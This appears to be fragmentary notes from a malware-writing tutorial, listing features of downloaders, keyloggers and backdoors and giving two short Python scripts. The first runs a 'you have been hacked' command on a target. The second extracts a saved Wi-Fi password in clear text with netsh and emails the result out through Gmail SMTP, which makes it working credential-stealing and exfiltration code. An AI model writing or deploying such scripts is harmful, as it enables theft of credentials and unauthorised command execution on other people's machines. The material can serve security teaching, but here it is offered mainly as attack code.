• Download file.
  • Execute Code.
  • Send Report.
  • Download & Execute.
  • Execute & Report.
  • Download, Execute & Report.


A program that records keys pressed on the keyboard.


  • Access file system.
  • Execute system commands.
  • Download files.
  • Upload files.
  • Persistence.




Execute system command on target.


  • if a program is executed on Windows -> execute windows commands.
  • if a program is executed on Mac OS X -> execute Unix commands.

After packaging:

  • Execute any system command on any OS using a single file.
  1. #!/usr/bin/env python
  3. import subprocess
  5. command = "msg * you have been hacked"
  6. subprocess.Popen(command, shell=True)

Execute AND Report

Execute system command on the target and send the result to email.

  1. #!/usr/bin/env python
  3. import smtplib
  4. import subprocess
  6. def send_mail(email, password, message):
  7. server = smtplib.SMTP("smtp.gmail.com", 587)
  8. server.starttls()
  9. server.login(email, password)
  10. server.sendmail(email, email, message)
  11. server.quit()
  13. command = "netsh wlan show profile \"Panda Home\" key=clear"
  14. result = subprocess.check_output(command, shell=True)
  15. send_mail("aaaa@gmail.com", "", result)

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